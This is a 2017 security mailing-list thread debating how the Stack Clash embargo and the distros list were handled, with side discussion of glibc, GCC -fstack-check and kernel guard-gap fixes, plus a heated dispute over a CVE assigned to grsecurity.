It was an excellent stress-test for the distros list, people's ability
to read lots of encrypted e-mail, etc. But let's not do it again.

> Yet nobody flipped out. It was unexciting.

Well, almost. For something shared with so many organizations and
people, it is in fact unexciting we haven't seen a full public leak.

When the embargo extension was made, it was also decided that distros
should in fact be prepared for leaks, which means preparing or being
ready to prepare emergency updates with what I called mitigations and
workarounds. What I think we should have done instead is work in this
emergency mode from the start, releasing those mitigations and
workarounds first and only then work in public on longer-term fixes.

> I suspect it was all so smooth because on Monday because everyone was
> ready, everyone knew what was going on. There was no rushing, nothing was
> on fire. There was time to develop patches properly. Everyone had their
> story straight. It's quite likely if you force a release in two weeks
> because that's the rule, someone not ready would create a story where one
> shouldn't exist.

Yes. However, one Linux distro vendor who is not currently on distros
(despite of asking privately to join before) e-mailed me off-list saying
they were indeed on fire (even if largely in terms of publicity and
customer support rather than security). And that's just one who
bothered to e-mail - I'm sure there were more. Granted, they can now
prepare their updates within hours or days due to the work done by SUSE,
Red Hat, and others on the distros list, hopefully in time before
attacks using the Qualys findings start or become widespread, but
nevertheless they are at a disadvantage. They also confirmed to me that
for them me either shutting down the distros list or accepting them onto
the list would be a better option than the status quo.

So I am in fact planning to do one of these things. My removal of the
"19 days" option is also a way to counter-balance the negative impact of
possibly adding a few more distros. I wish we could go for 7 days max,
but currently this appears unrealistic (we should have the average below
7 days, though). So I'll open up the distros list for more members
shortly, but I am going to enforce the policy more(*) strictly. If this
fails, then I'll shut the list down.

(*) This means there might still be an exception for something truly
exceptional, but to be specific: nothing handled on the (linux-)distros
lists so far was exceptional enough for that, so under the kind of
policy enforcement I am currently planning, there would have been no
exceptions so far.

> I applaud everyone involved. I'm sure there were issues, but I doubt such a
> large effort could have gone better.

I agree.

However, we need to learn from this occasion and do better next time.

> Rules such as this exist to guide us, don't let them constrain us.

I see no other reasonable choice than letting the rules constrain us,
given what my willingness to "consider" an exception resulted in.

That said, I intend to stay reasonable - just having learned and made
adjustments from the experience so far.

Alexander
Stuart Henderson
2017-06-21 15:15:52 UTC
Permalink
On 2017/06/21 16:36, Solar Designer wrote:
> Granted, they can now
> prepare their updates within hours or days due to the work done by SUSE,
> Red Hat, and others on the distros list, hopefully in time before
> attacks using the Qualys findings start or become widespread, but
> nevertheless they are at a disadvantage.

People doing this might want to note that Icinga ran into problems
with the fix in RHEL/Centos kernels when using setrlimit to restrict
the stack size below the default.

The Red Hat ticket is currently locked but there's some information at
https://bugs.centos.org/view.php?id=13453.
k***@redhat.com
2017-06-21 16:06:39 UTC
Permalink
On 06/21/2017 09:15 AM, Stuart Henderson wrote:
> On 2017/06/21 16:36, Solar Designer wrote:
>> Granted, they can now
>> prepare their updates within hours or days due to the work done by SUSE,
>> Red Hat, and others on the distros list, hopefully in time before
>> attacks using the Qualys findings start or become widespread, but
>> nevertheless they are at a disadvantage.
>
> People doing this might want to note that Icinga ran into problems
> with the fix in RHEL/Centos kernels when using setrlimit to restrict
> the stack size below the default.
>
> The Red Hat ticket is currently locked but there's some information at
> https://bugs.centos.org/view.php?id=13453.

Ah sorry about that, I've made

https://bugzilla.redhat.com/show_bug.cgi?id=1463241

public, kernel bugs default to private and then typically get opened up
(mostly because people have a tendency to put traces/dumps with
sensitive information in them and we don't want someone accidentally
exposing their SSH host keys or whatever).

--
Kurt Seifried -- Red Hat -- Product Security -- Cloud
PGP A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Red Hat Product Security contact: ***@redhat.com
Qualys Security Advisory
2017-06-21 21:40:06 UTC
Permalink
Hi Solar, all,

Thank you very much for this constructive feedback. For the sake of
transparency and an improved disclosure process in the future, we will
do the same now, and also address some of the concerns that have been
expressed since Monday.

But first, we would like to thank everyone who was involved in this
disclosure, for their hard work and patience, and especially Solar for
creating and administering the mailing-lists that made it possible (and
for accepting, although reluctantly, the embargo extension).

On Mon, Jun 19, 2017 at 10:39:33PM +0200, Solar Designer wrote:
> The stated argument for extending the embargo duration beyond list
> policy's maximum was that fixes presumably wouldn't be ready.

This was not the only reason why we eventually decided to extend the
embargo; here is what we wrote in an e-mail to distros@, on May 28:

"""
The discussions that
took place here on distros eventually forced us to extend the embargo
from the original CRD (May 30) to June 19:

- there are serious problems with the two solutions that we proposed
("Increase the size of the stack guard-page" and "Recompile all
userland code with GCC's -fstack-check option");

- please see Red Hat's analysis, attached;

- when we asked here if distros would be ready by May 30, only three
answered (two "yes", one "no"), and hoping for the best ("the ones who
did not answer will surely be ready") was not an option, and "let's
publish anyway on May 30, distros should have been ready" was not an
option either (the end users would be the ones suffering from such a
debacle).
"""

The first problem was that 1MB is not enough on all architectures; the
second problem was that -fstack-check does not always "touch" all pages;
and Red Hat's analysis was an extensive report about the fixes needed in
the kernel, the glibc, and gcc.

All of this, plus the third reason mentioned above, and our own
assessment of the situation, helped us make our decision to extend the
embargo.

> I understand
> it's rare for companies to do quality security research, and I didn't
> want my action to have hampered the stream of quality security research
> we're seeing from Qualys lately.

Thank you very much. However, we must admit that this coordinated
release has been one of the most stressful and painful experiences we
ever had: we were torn between those who wanted to publish early and
those who wanted to publish later, and in the middle of all this
coordination we were trying to complete our research (we had not
successfully exploited 64-bit Linux yet when we first contacted
distros@).

Such a responsible disclosure could have been, and should have been,
easier and simpler, even with so many vendors involved. How could such
a situation be handled better next time? We are open to suggestions.

Finally, we would like to address a concern that has been voiced by
Chris Evans (who has also quoted Solar's mail, thus answering here):

"""
There's also the question of whether "customers" get access to details
before patches are available
"""

Absolutely not: we have not shared a single detail of these
vulnerabilities with anyone outside of Qualys before the Coordinated
Release Date; and even within Qualys, we have kept this
compartmentalized until the very end.

Thank you very much!

With best regards,

--
the Qualys Security Advisory team
Jeff Law
2017-06-21 23:30:22 UTC
Permalink
On 06/21/2017 03:40 PM, Qualys Security Advisory wrote:

>
> The first problem was that 1MB is not enough on all architectures; the
> second problem was that -fstack-check does not always "touch" all pages;
> and Red Hat's analysis was an extensive report about the fixes needed in
> the kernel, the glibc, and gcc.
And just one data point here. We (Red Hat) had hoped to be able to drop
in a compiler update with an improved -fstack-check and rebuild at least
glibc with that compiler.

However, the further we dug, the more significant problems we found,
particularly as we started looking at other architectures.

As late at June 8, we were still internally debating the pros/cons of
updating GCC and rebuilding GLIBC with the new compiler, even if only
certain platforms were covered. The ultimate decision was to play it
safe and defer integration of the GCC work to a later update.

The embargo extension may have been painful, but it gave us the time to
look deeply at the GCC situation and come to a well reasoned technical
conclusion.

Had we done forward in May per the original schedule we well could have
made an incorrect technical decision under the significant time
pressure. The consequences of getting that decision wrong are
potentially greater than the impact of this particular security issue.
That would also have put other distros that use GCC at as disadvantage
as the in-progress GCC bits were not "upstream ready" and thus would
have been dropped into Red Hat's GCC sources which would likely have
been fairly difficult for other distros that use GCC to consume.




>
> All of this, plus the third reason mentioned above, and our own
> assessment of the situation, helped us make our decision to extend the
> embargo.
Understood and thanks for evaluating the situation as a whole and coming
to a well reasoned decision WRT the embargo.

--


I don't speak for anyone but myself, but I strongly believe in making
reasonable, rational decisions based on the best information available
rather than following policy blindly. Don't get me wrong, policy is
important as it often encodes years of hard learned lessons and often
policy is a good default position.


>
>> I understand
>> it's rare for companies to do quality security research, and I didn't
>> want my action to have hampered the stream of quality security research
>> we're seeing from Qualys lately.
>
> Thank you very much. However, we must admit that this coordinated
> release has been one of the most stressful and painful experiences we
> ever had: we were torn between those who wanted to publish early and
> those who wanted to publish later, and in the middle of all this
> coordination we were trying to complete our research (we had not
> successfully exploited 64-bit Linux yet when we first contacted
> distros@).
Understood. I'd like to point out that knowing 64bit exploits had not
been completed, but looked reasonably possible was very helpful in our
internal discussions about the breadth of the problem.

And more generally thanks for all the work in this space! Don't ever
hesitate to contact me with any questions/concerns WRT GCC's code
generation in this space or others.


jeff
Daniel Micay
2017-06-22 06:00:52 UTC
Permalink
Is it planned to have glibc use a larger 1M gap for secondary stacks
rather than a single guard page? That would be a *lot* easier than it
was to set it up for the main thread stack. It follows the main thread
stack rlimit as a guideline so it seems to make sense to use the same
guard region size too. If it ends up exposed as a sysctl, it could read
the current value from there.

For the local setuid/setgid/setcap binary attack surface, the main
thread stack is most relevant, but in general many cases of large stack
frames that were found are called in threads other than the initial one.
Secondary stacks are also mixed in with other mmap allocations rather
than having a separate ASLR base and glibc doesn't do any secondary
stack ASLR. IIRC, it does cache color the stacks but not randomly and I
don't remember how much space it currently reserves for that.
Florian Weimer
2017-06-22 10:19:35 UTC
Permalink
On 06/22/2017 08:00 AM, Daniel Micay wrote:
> Is it planned to have glibc use a larger 1M gap for secondary stacks
> rather than a single guard page? That would be a *lot* easier than it
> was to set it up for the main thread stack. It follows the main thread
> stack rlimit as a guideline so it seems to make sense to use the same
> guard region size too. If it ends up exposed as a sysctl, it could read
> the current value from there.

On the glibc side, we are waiting for the kernel interface for the
configurable gap size to materialize upstream.

Thanks,
Florian
Agostino Sarubbo
2017-06-21 10:46:28 UTC
Permalink
On Monday 19 June 2017 08:28:43 Qualys Security Advisory wrote:
> III. Solutions
> - Recompile all userland code (ld.so, libraries, binaries) with GCC's
> "-fstack-check" option, which prevents the stack-pointer from moving
> into another memory region without accessing the stack guard-page (it
> writes one word to every 4KB page allocated on the stack).

For the record, Gentoo Hardened enables by default -fstack-check=specific

--
Agostino Sarubbo
Gentoo Linux Developer
Brad Spengler
2017-06-21 12:25:26 UTC
Permalink
On Wed, Jun 21, 2017 at 12:46:28PM +0200, Agostino Sarubbo wrote:
> On Monday 19 June 2017 08:28:43 Qualys Security Advisory wrote:
> > III. Solutions
> > - Recompile all userland code (ld.so, libraries, binaries) with GCC's
> > "-fstack-check" option, which prevents the stack-pointer from moving
> > into another memory region without accessing the stack guard-page (it
> > writes one word to every 4KB page allocated on the stack).
>
> For the record, Gentoo Hardened enables by default -fstack-check=specific

I'd also like to mention for the record, that despite tweets like:
https://twitter.com/kurtseifried/status/876818809079816193
"CVE-2017-1000377 Oh you thought running GRsecurity PAX was going to save
you?"
https://twitter.com/GentooHardened/status/877309872714522624
(the latter apparently having been removed, while the former is
still going strong solely due to the stubbornness of its author)

grsecurity was the only project without a valid CVE assigned to it.

Kurt Seifried of Red Hat chose to make use of the 4 weeks he had in
private to assign a bogus CVE against grsecurity (let's ignore that Kurt
thinks "GRsecurity" is a vendor and "PAX" is a product), then shot off
with a claim completely opposite from that present in the advisory.
Despite being called out on it by numerous people in public, and despite
my offering in private to allow him to correct his own almost
gleefully-published lies, he's instead chosen to waste two full days of
our time and that of several others, including Qualys, who for the public
record did not request the CVE against grsecurity. Kurt Seifried of Red
Hat chose to do it himself, and even provided private emails
demonstrating as such.

In my view, this taints the CVE process when someone apparently so
biased fails to take responsibility for their own actions, and uses their
position as judge, jury, and executioner of the DWF/CVE process to dole
out damaging claims that are in direct opposition to what was stated in
the advisory in the first place, for anyone who had read it at all.

Either Kurt Seifried of Red Hat didn't read the advisory at all in those
4 weeks, or he was too incompetent to understand the clear statements
being made in it, and too stubborn to admit his mistake, choosing to
leave his tweet up even now, apparently waiting for the news cycle to
end on this issue.

I was not contacted about this CVE ahead of time where it would have
been trivial to correct any incompetence on the part of Kurt prior to
the CVE being incorrectly issued -- my first notification was his
childish tweet, not something I would expect from a supposed professional
during work hours at his Red Hat employment.

Kurt gave excuse after excuse, finally hiding behind the CVE process
itself, insisting Qualys would need to provide some reason for rejection
of the CVE (which they did, despite it not being necessary for them to do
so as they never requested the CVE in the first place). This was purely
the fault of Kurt Seifried, and he alone chose to intentionally delay the
entire process of correcting the matter, and also gave no justification
as to why his completely false tweet still remained despite there being
no formal process required there once it was abundantly clear he was in
the wrong. I would be happy to assume Kurt was simply incompetent and
either didn't read the advisory or didn't understand the simple facts
contained in it (like that the PoC would take over 1500 years to work
against grsecurity under even an intentionally weakened configuration),
but his stubborn refusal to remove or correct a tweet he is clearly aware
now is wrong suggests to me nothing other than maliciousness.

If I am wrong about something, I am happy to own up to it ASAP -- why
is it so difficult for certain other people to act decently?

It doesn't bode well for the embargoing process if this is how things
are going to work for projects that don't participate. Is the purpose
to prepare Red Hat's marketing materials in advance? To hide the fact
that this issue should have been obvious to them many years ago but
due to their lack of investment in security despite being a
multi-billion dollar company they failed to protect their customers
against it? Was the purpose for upstream developers to spend 4 weeks
NIH'ing our existing fix for this issue from 2010, repeating the same
events from 2010 as they've yet again produced a broken patch that oopses
machines and failed under trivial fuzzing?

Because if any lesson can be taken away from this whole mess, it's
certainly not whatever these others that didn't protect their users
for all these years have to say about it. It's a clear vindication of
our security strategy and a demonstration of what happens when actual
investment and effective original ideas informed by offense are put
into security.

Finally, one thing I noted was missing from Solar's timeline is that
on May 18th, the day after the private distros list was notified with
details, this commit appeared in public:
https://github.com/openbsd/src/commit/4ed6bfeac112229466414b94cdbd983fb8017796

OpenBSD publishing this commit, in combination with Solar making repeated
mentions here on oss-sec about a cross-OS issue being worked on was enough
for me to know that the underlying issue being discussed was what we had
widely discussed publicly in 2010 on LWN and elsewhere. What's the official
explanation for this, and is any action being taken for what I assume is a
member of the private list breaking the embargo?

Appendix:
Famous last words from the PaX Team in reply to Linus' broken heap stack gap
code from 2010:
https://lkml.org/lkml/2011/6/6/306
"what a pity that now you get to revert the whole shit
and implement it properly (i don't need to tell you where you can find such
a working solution, do i)."
(the whole post is quite good as an example of the dangers of NIH)

-Brad
Solar Designer
2017-06-21 13:57:27 UTC
Permalink
On Wed, Jun 21, 2017 at 08:25:26AM -0400, Brad Spengler wrote:
> Finally, one thing I noted was missing from Solar's timeline is that
> on May 18th, the day after the private distros list was notified with
> details, this commit appeared in public:
> https://github.com/openbsd/src/commit/4ed6bfeac112229466414b94cdbd983fb8017796

IIRC, they also committed a relevant fix to their qsort().

> OpenBSD publishing this commit, in combination with Solar making repeated
> mentions here on oss-sec about a cross-OS issue being worked on was enough
> for me to know that the underlying issue being discussed was what we had
> widely discussed publicly in 2010 on LWN and elsewhere. What's the official
> explanation for this, and is any action being taken for what I assume is a
> member of the private list breaking the embargo?

OpenBSD isn't a member of the distros list - they were notified by
Qualys separately. This matter was discussed, and some folks were
unhappy about OpenBSD's action, but in the end it was decided that
since, as you correctly say, the underlying issue was already publicly
known, OpenBSD's commits don't change things much. Sure this draws
renewed attention to the problem, but probably not to the extent and in
the many specific ways the Qualys findings cover. So it was decided to
keep the embargo on the detail.

Ditto for the "move mmap_area and PIE binaries away from the stack"
patch series posted to LKML and CC'ed to kernel-hardening on June 2:

http://www.openwall.com/lists/kernel-hardening/2017/06/02/

which might have been inspired by Qualys work known to Red Hat engineers
internally. A difference is that Red Hat is a member of the distros
list. I brought this up on the distros list, and another Red Hat person
said "We'll deal with this internally." Given the circumstances, I find
this response satisfactory.

I am far more concerned about the total embargo duration here than about
these two semi-leaks.

Alexander
Daniel Micay
2017-06-21 16:44:32 UTC
Permalink
> Ditto for the "move mmap_area and PIE binaries away from the stack"
> patch series posted to LKML and CC'ed to kernel-hardening on June 2:
>
> http://www.openwall.com/lists/kernel-hardening/2017/06/02/

That's tied to this, and talking to Riel about it on IRC, since he's
interested in upstreaming these kinds of changes:

https://gist.github.com/thestinger/b43b460cfccfade51b5a2220a0550c35

He submitted an initial set of the changes moving towards being able to
tie the stack mapping entropy to the mmap_rnd_bits sysctl upstream, and
likely increasing the default value to match the current stack entropy
on 32-bit. It wasn't motivated by stack exhaustion bugs. The stack
rlimit calculation bug and ASLR range overlap issue are something that
has been publicly discussed not tied to this context.

RAND_THREADSTACK wasn't in the scope of that effort because CopperheadOS
does ASLR for secondary stacks in userspace where it can randomize lower
bits along with splitting a region for libraries (incl. dlopen) from the
rest of the mmap usage.

I didn't get early disclosure access or a leak of this round of issues.
I wouldn't have done anything in response to it. I already went through
the userspace Android Open Source Project alloca / VLA uses last year
due to the unavailability of -fstack-check in Clang and only found CVE-
2016-3922 (unbounded VLA at a local privilege boundary), a few bugs that
I considered security bugs but that Google did not and a bunch of bugs
that I ruled out as possible security issues. Some of those are now gone
due to rewrites from C and C style C++ to higher level C++ or Java.

It looks like https://reviews.llvm.org/D34386 is finally going to land
for Rust and then it's straightforward to have Clang stop implementing
-fstack-check as a no-op for architectures where that gets ported. It'll
be nice not needing to carry an out-of-tree patch derived from a failed
past attempt to land it.
Brad Spengler
2017-06-21 21:27:43 UTC
Permalink
> OpenBSD isn't a member of the distros list - they were notified by
> Qualys separately. This matter was discussed, and some folks were
> unhappy about OpenBSD's action, but in the end it was decided that
> since, as you correctly say, the underlying issue was already publicly
> known, OpenBSD's commits don't change things much. Sure this draws
> renewed attention to the problem, but probably not to the extent and in
> the many specific ways the Qualys findings cover. So it was decided to
> keep the embargo on the detail.

Thank you for clarifying that, my assumption was indeed wrong then.

Still, if OpenBSD was able to resolve the issues necessary after
notification without leaking full details to the public, shouldn't
this have been possible for the other projects without an embargo,
let alone an extended one? Especially considering that the full
duration of the extended embargo didn't result in complete fixes for
the issue and in fact resulted in a broken fix for Linux, which
could easily have been avoided if the discussions around it happened
in public (and none of the deep details from the Qualys advisory
would have been needed for any of those discussions).
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f4cb767d76cf7ee72f97dd76f6cfa6c76a5edc89
for instance mentions Linus' fix blew up in 3 minutes of fuzz testing.

> Ditto for the "move mmap_area and PIE binaries away from the stack"
> patch series posted to LKML and CC'ed to kernel-hardening on June 2:
>
> http://www.openwall.com/lists/kernel-hardening/2017/06/02/
>
> which might have been inspired by Qualys work known to Red Hat engineers
> internally. A difference is that Red Hat is a member of the distros
> list. I brought this up on the distros list, and another Red Hat person
> said "We'll deal with this internally." Given the circumstances, I find
> this response satisfactory.

At first I was rather concerned about this, so I emailed Rik
directly and asked him the simple question of whether the advance
notice prioritized or kickstarted the process of porting those
features, regardless of having looked at some code in the past (as I
imagine much of our code has been looked at). I too am satisfied
with his answer that the actual porting work on his part had already
been done prior to that notice, and that any internal concerns afterward
were simply to avoid the appearance of impropriety.

My take on the embargoing process (outside of what's already mentioned
on https://grsecurity.net/an_ancient_kernel_hole_is_not_closed.php ):
I've always been concerned by the fact that smaller distros seem to
be barred from distros-list membership; it seems the arrangement
lends itself too much to enabling the marketing of the larger
companies and in fact perhaps even disincentivizing their investment
in security as the embargo process enables them to skirt much of the
public pain they'd otherwise have to experience (for in this
instance what was a completely avoidable problem). I get the practical
reasons for the policy (increased leak risk, major distros often do
the actual fixing work, etc) but from a level of principle it's always
rubbed me the wrong way.

So despite that I have full trust in you Alexander as being
completely transparent and impartial despite having to engage in a
bit of politics necessary to work with all the companies involved, I
am uneasy (and I believe I note some uneasiness in your own mails)
with how others are exploiting the arrangment despite your sincere
efforts at sticking to the policies you established.

That said, I think regardless of whether you head the distros list
or not, the major companies are going to see it to be in their
financial/PR interest to maintain an embargo list. I would not be
surprised at all if were you to step down from the role/shutter the
list, a company like Red Hat would quickly swoop in to "take the
reins." Which would be a shame and adds to my general worries about
the direction this industry is going in, since your record for fairness
is sterling, and I doubt very much that dogged dedicated to
transparency, fairness, and ethics would continue with anyone else
at the helm.

Thanks,
-Brad
Mike O'Connor
2017-06-22 00:26:05 UTC
Permalink
:Still, if OpenBSD was able to resolve the issues necessary after
:notification without leaking full details to the public, shouldn't
:this have been possible for the other projects without an embargo,

Several open-source distros fixing the same flavor of issue in the
same timeframe might've raised suspicions in a way that one distro
alone wouldn't have. Heck, I've tracked down embargoed security
issues just from what multiple closed source vendors documented in
their release notes.

:My take on the embargoing process (outside of what's already mentioned
:on https://grsecurity.net/an_ancient_kernel_hole_is_not_closed.php ):
:I've always been concerned by the fact that smaller distros seem to
:be barred from distros-list membership; it seems the arrangement
:lends itself too much to enabling the marketing of the larger
:companies and in fact perhaps even disincentivizing their investment
:in security as the embargo process enables them to skirt much of the
:public pain they'd otherwise have to experience (for in this
:instance what was a completely avoidable problem). I get the practical
:reasons for the policy (increased leak risk, major distros often do
:the actual fixing work, etc) but from a level of principle it's always
:rubbed me the wrong way.

In the past, I've proposed that the embargo mailing list archives
themselves have an "embargo", after which they become public. That
way, there's after-the-fact transparency, and it gives the folks who
care a good idea of what happened. Is there anything sensitive at
this point in, say, the March 2017 linux-distros archives??

-Mike

--
Michael J. O'Connor ***@dojo.mi.org
=--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--=
"Well done is better than well said." -Ben Franklin
Solar Designer
2017-06-24 14:57:14 UTC
Permalink
On Wed, Jun 21, 2017 at 08:26:05PM -0400, Mike O'Connor wrote:
> In the past, I've proposed that the embargo mailing list archives
> themselves have an "embargo", after which they become public. That
> way, there's after-the-fact transparency, and it gives the folks who
> care a good idea of what happened. Is there anything sensitive at
> this point in, say, the March 2017 linux-distros archives??

There shouldn't be anything sensitive in old archives, such as in your
example. Technically, we can easily extract and make public the message
Subjects. For full messages, we need a way to mass-decrypt an mbox
containing PGP/MIME messages. Maybe I should list implementing a
program that would do that(*) as one of the options that a new distros
list member could choose as their contribution back to the community.

(*) Mutt hack maybe? Mutt processes those messages great, so having it
output them in decrypted form into another mbox and automatically loop
over all messages in the input mbox might do the trick.

Alexander
Jeff Law
2017-06-23 13:56:30 UTC
Permalink
On 06/21/2017 03:27 PM, Brad Spengler wrote:
>> OpenBSD isn't a member of the distros list - they were notified by
>> Qualys separately. This matter was discussed, and some folks were
>> unhappy about OpenBSD's action, but in the end it was decided that
>> since, as you correctly say, the underlying issue was already publicly
>> known, OpenBSD's commits don't change things much. Sure this draws
>> renewed attention to the problem, but probably not to the extent and in
>> the many specific ways the Qualys findings cover. So it was decided to
>> keep the embargo on the detail.
>
> Thank you for clarifying that, my assumption was indeed wrong then.
>
> Still, if OpenBSD was able to resolve the issues necessary after
> notification without leaking full details to the public, shouldn't
> this have been possible for the other projects without an embargo,
> let alone an extended one?
I really doubt it for GCC for a variety of reasons. Hell, I doubt I
could have gotten even a good discussion going about the problems with
-fstack-check without the details of the embargo'd CVE.

Even if I was able to get interest from other key GCC contributors, the
level of detail I'd have to disclose to those key contributors to make
progress would likely have violated the embargo.

Perhaps part of the difference is OpenBSD can move fairly independently
while something like GCC requires larger scale coordination and public
discussion.

Jeff
Kurt Seifried
2017-06-23 14:02:36 UTC
Permalink
On 2017-06-23 7:56 AM, Jeff Law wrote:
> On 06/21/2017 03:27 PM, Brad Spengler wrote:
>>> OpenBSD isn't a member of the distros list - they were notified by
>>> Qualys separately. This matter was discussed, and some folks were
>>> unhappy about OpenBSD's action, but in the end it was decided that
>>> since, as you correctly say, the underlying issue was already publicly
>>> known, OpenBSD's commits don't change things much. Sure this draws
>>> renewed attention to the problem, but probably not to the extent and in
>>> the many specific ways the Qualys findings cover. So it was decided to
>>> keep the embargo on the detail.
>> Thank you for clarifying that, my assumption was indeed wrong then.
>>
>> Still, if OpenBSD was able to resolve the issues necessary after
>> notification without leaking full details to the public, shouldn't
>> this have been possible for the other projects without an embargo,
>> let alone an extended one?
> I really doubt it for GCC for a variety of reasons. Hell, I doubt I
> could have gotten even a good discussion going about the problems with
> -fstack-check without the details of the embargo'd CVE.
>
> Even if I was able to get interest from other key GCC contributors, the
> level of detail I'd have to disclose to those key contributors to make
> progress would likely have violated the embargo.
>
> Perhaps part of the difference is OpenBSD can move fairly independently
> while something like GCC requires larger scale coordination and public
> discussion.
>
> Jeff
>
OpenBSD made changes to the then known qsort() issue, and implemented
what was then thought to be the solution to the stack guard issue, the 1
megabyte guard pages. Subsequent discussion (without OpenBSD present,
due to them breaking the embargo) took place and as you know we ended up
with some pretty significant changes to glibc (I don't know if OpenBSD
has picked this group of fixes up or not).

--
Kurt Seifried -- Red Hat -- Product Security -- Cloud
PGP A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Red Hat Product Security contact: ***@redhat.com
Solar Designer
2017-06-24 14:14:42 UTC
Permalink
On Fri, Jun 23, 2017 at 08:02:36AM -0600, Kurt Seifried wrote:
> OpenBSD made changes to the then known qsort() issue, and implemented
> what was then thought to be the solution to the stack guard issue, the 1
> megabyte guard pages. Subsequent discussion (without OpenBSD present,
> due to them breaking the embargo) took place and as you know we ended up
> with some pretty significant changes to glibc (I don't know if OpenBSD
> has picked this group of fixes up or not).

I think Kurt's words "without OpenBSD present, due to them breaking the
embargo" are Kurt's (and maybe others') impression only (and maybe these
people's personal decision(s) not to inform OpenBSD going forward, as
Kurt mentioned he did help ping OpenBSD this time when Qualys wasn't
getting a response from them in early May). No decision on the distros
list at large was made to either inform or not inform OpenBSD of further
issues. As it happened, we did CC the discussion around Cron to Todd
(although like I said in my posting about Cron in here, there was no
point in having that minor issue embargoed in the first place). The
glibc issues and fixes are most likely irrelevant to *BSD libc's - in
fact, we should have been more careful not to spam the full distros list
with them (I think some sub-threads correctly went to linux-distros
only, but some did not).

Alexander
Qualys Security Advisory
2017-06-21 22:15:11 UTC
Permalink
Hi Brad, Theo, all,

On Wed, Jun 21, 2017 at 08:25:26AM -0400, Brad Spengler wrote:
> OpenBSD publishing this commit
> ...
> What's the official
> explanation for this, and is any action being taken for what I assume is a
> member of the private list breaking the embargo?

OpenBSD is not a member of distros@, and we therefore contacted them
separately: we tried a first time on May 3, then a few times after that,
and on May 12 we received a reply. On that same day, and before we sent
them our advisory draft (OpenBSD part only), we asked them if they would
accept an embargo until May 30, and they accepted.

On May 13 they acknowledged receipt of our advisory draft, on May 17 we
sent them our proof-of-concept, and on May 18 we were notified by a
distros@ member that OpenBSD publicly patched their qsort(), and on May
19 we were notified by another distros@ member that OpenBSD publicly
patched their stack guard-page implementation.

On May 19 we asked OpenBSD for an explanation as to why they broke the
embargo, and on May 21 we received a mail from them but no explanation.

However, instead of dwelling on the past, we would like to ask an
important question about the future: what should we do the next time we
(or other researchers) discover a vulnerability that affects OpenBSD and
other operating systems? Will OpenBSD properly enforce the next
embargo? Please advise. Thank you very much!

With best regards,

--
the Qualys Security Advisory team
Jeff Law
2017-06-21 16:22:20 UTC
Permalink
On 06/21/2017 04:46 AM, Agostino Sarubbo wrote:
> On Monday 19 June 2017 08:28:43 Qualys Security Advisory wrote:
>> III. Solutions
>> - Recompile all userland code (ld.so, libraries, binaries) with GCC's
>> "-fstack-check" option, which prevents the stack-pointer from moving
>> into another memory region without accessing the stack guard-page (it
>> writes one word to every 4KB page allocated on the stack).
>
> For the record, Gentoo Hardened enables by default -fstack-check=specific
And if you were to look at the generated code, you'll see that it
happily skips 2-3 pages of probes in prologues as well as within alloca
spaces. It's a false sense of security.

jeff
PaX Team
2017-06-21 21:29:56 UTC
Permalink
On 21 Jun 2017 at 10:22, Jeff Law wrote:

> On 06/21/2017 04:46 AM, Agostino Sarubbo wrote:
> > On Monday 19 June 2017 08:28:43 Qualys Security Advisory wrote:
> >> III. Solutions
> >> - Recompile all userland code (ld.so, libraries, binaries) with GCC's
> >> "-fstack-check" option, which prevents the stack-pointer from moving
> >> into another memory region without accessing the stack guard-page (it
> >> writes one word to every 4KB page allocated on the stack).
> >
> > For the record, Gentoo Hardened enables by default -fstack-check=specific
> And if you were to look at the generated code, you'll see that it
> happily skips 2-3 pages of probes in prologues as well as within alloca
> spaces. It's a false sense of security.

Gentoo Hardened uses the grsecurity kernel which enforces a 64kB heap-stack
gap by default (it's also user adjustable). are you saying that the gcc
probes are not sufficient to prevent jumping over that range?
Jeff Law
2017-06-21 22:48:14 UTC
Permalink
On 06/21/2017 03:29 PM, PaX Team wrote:
> On 21 Jun 2017 at 10:22, Jeff Law wrote:
>
>> On 06/21/2017 04:46 AM, Agostino Sarubbo wrote:
>>> On Monday 19 June 2017 08:28:43 Qualys Security Advisory wrote:
>>>> III. Solutions
>>>> - Recompile all userland code (ld.so, libraries, binaries) with GCC's
>>>> "-fstack-check" option, which prevents the stack-pointer from moving
>>>> into another memory region without accessing the stack guard-page (it
>>>> writes one word to every 4KB page allocated on the stack).
>>>
>>> For the record, Gentoo Hardened enables by default -fstack-check=specific
>> And if you were to look at the generated code, you'll see that it
>> happily skips 2-3 pages of probes in prologues as well as within alloca
>> spaces. It's a false sense of security.
>
> Gentoo Hardened uses the grsecurity kernel which enforces a 64kB heap-stack
> gap by default (it's also user adjustable). are you saying that the gcc
> probes are not sufficient to prevent jumping over that range?
With a 64k guard, you should be OK and protected. -fstack-check will
consistently skip 8218 bytes on x86 (8192 on most architectures). Even
if you combined the skipped space from the prologue and the skipped
space in the dynamic area, you're only at just over 16k -- and it's not
clear the two skipped areas could be combined like that anyway.


Given the larger guard you should be in good shape. Sorry to have
sounded alarmist without having full information about your
configuration, particularly WRT the expanded guard page.


--

There's one theoretical approach I'm aware of that one could use the
skip the guard in your situation. I'm not aware of any code in practice
that would have the right properties to trigger *and* triggering would
require a particular optimization that neither LLVM nor GCC perform to
the best my knowledge (nor are they likely to as the optimization would
not likely improve any hot path performance).

We'll be making that theoretical attack significantly harder to exploit
as part of the upstream GCC work around a new -fstack-check implementation.


Jeff
Loading...